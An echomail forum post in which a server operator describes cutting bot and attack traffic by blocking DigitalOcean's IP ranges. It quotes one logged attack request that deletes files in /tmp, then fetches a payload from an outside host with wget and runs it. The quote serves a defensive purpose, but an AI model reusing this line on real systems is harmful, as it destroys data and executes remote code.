Subj : IP Block Lists To : All From : Warpslide Date : Fri Mar 18 2022 22:22:36 Hi All, I have a web server accessible to the public, which as expected was getting hammered with various bots & script kiddies. I've setup an IP blocklist for the usual suspects, but I was noticing a lot of malicious traffic from California, Germany, The Netherlands & the UK as well. Not wanting to block those countries out entirely I decided to dig a little deeper and noticed that many of these addresses had one thing in common: They're coming from Digital Ocean. Most of these seem to be trying to log into wordpress or bring up other login pages for other services that don't exist on this web server. Others seem to be a little more insidious: "GET /shell?cd+/tmp;rm+-rf+*;wget+31.210.xx.xxx/jaws;sh+/tmp/jaws HTTP/1.1" None of these work or do anything on my webserver, but I still don't want them hammering on my system. Fortunately Digital Ocean publishes a full list of the IP addresses they use: https://digitalocean.com/geo/google.csv After adding these ranges to my blocklist suddenly my apache logs are a lot quieter. Do you filter by country/region or by provider? If so, which IP ranges do you block? p.s: I know some BBS hubs are located on VPS providers, you may need to modify these lists if you want to use them so you can still communicate with your hub if they happen to use Digital Ocean. ML looks like he uses OVH so he's safe... ;) Jay .... The manner in which it is given is worth more than the gift. --- Mystic BBS v1.12 A48 2022/03/11 (Raspberry Pi/32) * Origin: Northern Realms (1337:3/126) .